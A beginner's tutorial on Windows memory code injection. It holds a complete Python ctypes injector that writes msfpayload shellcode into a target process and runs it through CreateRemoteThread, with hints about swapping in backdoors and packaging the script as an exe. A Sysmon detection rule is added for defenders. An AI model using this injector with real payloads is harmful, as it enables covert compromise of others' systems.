Background
This article is a beginner's foundation, pure popular science; experts, please go easy on me ~
All the content in this tutorial is for study purposes only. Do not use it for illegal purposes; otherwise, I cannot help you...
Speaking of injection, the first thing that comes to mind is probably SQL injection, script injection (XSS), and so on. Today, light ++ (shou) takes you from the web end back to the operating system, discusses the classic Windows injection technique, memory injection, and uses Python to write a simple code injection program.
Common memory injection methods include DLL injection and code injection. DLL injection means injecting our own DLL into the address space of the target process and executing it there. DLL injection requires a separate "propeller" program to push our "parasite" DLL into the target process.
Code injection works the same way as DLL injection, except that the "parasite" code lives in the same program as the "propeller" code.
DLL file: a Windows dynamic link library. In Windows, many applications are not a single complete executable; they are split into relatively independent dynamic link libraries, the DLL files, which are placed in the system. When we run a program, the corresponding DLL files are loaded.
This experiment uses code injection. No more talk, let's get started!
Preparations
To write small Python programs, light recommends the sexy Sublime Text 2 + JEDI (a Python auto-completion plug-in).
First install Sublime Text 2's plug-in manager, Package Control:
After opening Sublime, press Ctrl + ` to open the console, paste the following code into the command line, and press Enter:
import urllib2,os; pf='Package Control.sublime-package'; ipp=sublime.installed_packages_path(); os.makedirs(ipp) if not os.path.exists(ipp) else None; open(os.path.join(ipp,pf),'wb').write(urllib2.urlopen('http://sublime.wbond.net/'+pf.replace(' ','%20')).read())
After the installation completes, restart Sublime Text 2, press Ctrl + Shift + P, and type Install Package.
Type "jedi" and press Enter to install JEDI.
With the plug-in installed, we can officially start writing code.
Cooking starts
Raw materials: Win7, Python 2.7, Sublime Text 2, and msfpayload
Essential skills: Windows API basics, Python basics, and Metasploit basics! (http://zone.wooyun.org/content/17377)
This injection code relies mainly on Python's ctypes library, which lets Python call Windows APIs directly, which is very convenient. "Why not use C or C++?" Because the only book I have at hand is Gray Hat Python.
# -*- coding: utf-8 -*-
# Import the sys library and the ctypes library
import sys
from ctypes import *

PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM = (0x1000 | 0x2000)   # MEM_COMMIT | MEM_RESERVE

kernel32 = windll.kernel32

# Check the command line before reading the PID from it
if len(sys.argv) < 2:
    print "Code Injector: ./code_injector.py <PID to inject>"
    sys.exit(0)
pid = int(sys.argv[1])

# The shellcode is generated with msfpayload; this one pops the calculator.
# Of course, you could generate a backdoor program instead.
# Generated with: msfpayload windows/exec CMD=calc.exe EXITFUNC=thread C
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
             "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
             "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
             "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
             "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
             "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
             "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
             "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
             "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
             "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
             "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xaa\xc5\xe2\x5d"
             "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
             "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
             "\x2e\x65\x78\x65\x00")
code_size = len(shellcode)

# Obtain a handle to the process to be injected
h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if not h_process:
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate memory in the target process for our shellcode
arg_address = kernel32.VirtualAllocEx(h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
if not arg_address:
    print "[*] Couldn't allocate memory in PID: %s" % pid
    sys.exit(0)

# Write the shellcode into that memory
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))

# Create a remote thread whose entry point is the start of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process, None, 0, arg_address, None, 0, byref(thread_id)):
    print "[*] Failed to inject shellcode. Exiting."
    sys.exit(0)

print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
Handle: the difference between a handle and an ordinary pointer is that a pointer holds the memory address of the referenced object, whereas a handle is a reference identifier managed by the system, which the system can map to a memory address. This indirect way of accessing objects strengthens the system's control over the referenced objects.
We can see that memory injection comes down mainly to one key API that Windows exposes: CreateRemoteThread. This function lets us create a thread that runs in another process's address space (hence "creating a remote thread").
The whole injection process can be divided into three steps: obtain a handle to the target process, write the shellcode into its memory, and create a remote thread. This is also the basic principle and mechanism of memory injection.
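As an added example (not code from the original post), here is the defender's view of the same three steps: a small correlation rule in Python 3, run over constructed Sysmon-style records, that flags a CreateRemoteThread (Sysmon Event ID 8) following a ProcessAccess (Event ID 10) in which the source was granted the thread-creation and memory-write rights the injector needs. The field names follow Sysmon's; the records, PIDs and image paths are constructed.

```python
from collections import defaultdict

# Access rights the injector's OpenProcess must obtain on the target. They are a
# subset of the PROCESS_ALL_ACCESS mask (0x1F0FFF) used by the script above.
PROCESS_CREATE_THREAD = 0x0002   # needed by CreateRemoteThread
PROCESS_VM_OPERATION = 0x0008    # needed by VirtualAllocEx
PROCESS_VM_WRITE = 0x0020        # needed by WriteProcessMemory
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
WINDOW_SECONDS = 60

# Constructed Sysmon-style records (not real telemetry). Event ID 10 = ProcessAccess,
# Event ID 8 = CreateRemoteThread; "t" is seconds since epoch, GrantedAccess an int.
SAMPLE_EVENTS = [
    {"EventID": 10, "t": 100, "SourceProcessId": 4242, "TargetProcessId": 1337,
     "SourceImage": r"C:\Python27\python.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": 0x1F0FFF},
    {"EventID": 10, "t": 101, "SourceProcessId": 800, "TargetProcessId": 1337,
     "SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": 0x1000},   # PROCESS_QUERY_LIMITED_INFORMATION only: benign
    {"EventID": 8, "t": 103, "SourceProcessId": 4242, "TargetProcessId": 1337,
     "SourceImage": r"C:\Python27\python.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "StartAddress": "0x02A40000"},
]


def find_injections(events, window=WINDOW_SECONDS):
    """Return (source_pid, target_pid, start_address) for every CreateRemoteThread that
    follows, within `window` seconds, a ProcessAccess on the same (source, target) pair
    that was granted thread-creation plus memory-write rights."""
    opened = defaultdict(list)   # (src_pid, dst_pid) -> times of suspicious handle opens
    hits = []
    for ev in sorted(events, key=lambda e: e["t"]):
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        # Parenthesised: in Python "==" binds tighter than "&"
        if ev["EventID"] == 10 and (ev["GrantedAccess"] & INJECT_MASK) == INJECT_MASK:
            opened[key].append(ev["t"])
        elif ev["EventID"] == 8 and any(0 <= ev["t"] - t0 <= window for t0 in opened[key]):
            hits.append((key[0], key[1], ev["StartAddress"]))
    return hits


if __name__ == "__main__":
    for src, dst, addr in find_injections(SAMPLE_EVENTS):
        print("remote thread from PID %d into PID %d at %s after a full-access handle" % (src, dst, addr))
```

The Task Manager record is ignored because its access mask lacks the write and thread-creation bits, which is what keeps this rule from firing on ordinary process enumeration.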
When using msfpayload to generate the shellcode, there are two pitfalls to watch out for.
Pitfall 1: msfencode cannot be used when msfpayload generates the shellcode. Some documents tell us to add msfencode -b '\x00' to keep null bytes out of the shellcode, but once msfencode is used, the shellcode is by default encoded once with the x86/shikata_ga_nai encoder. Here we recommend using msfpayload xxx C to generate pure shellcode.
Pitfall 2:
msfpayload windows/exec CMD=calc.exe C
The shellcode generated directly this way crashes the host process 100% of the time; it is simply a process killer. During testing I used Baidu Cloud Manager as the test target, and it went dark every time. It took a long time to climb out of this pit.
Later, a friend debugged it with OllyDbg and found that when the shellcode finishes, it directly exits the process, killing the whole process.
With that friend's enthusiastic help, I consulted the official msfpayload documentation and decisively changed the EXITFUNC value to thread (the default is process):
Test successful!
Finally, we can package the Python script into an .exe executable with py2exe. If you are interested, you can add a UI to create a program that lets you customize the injection type (DLL or code injection) and the injected code (reverse backdoor or prank program).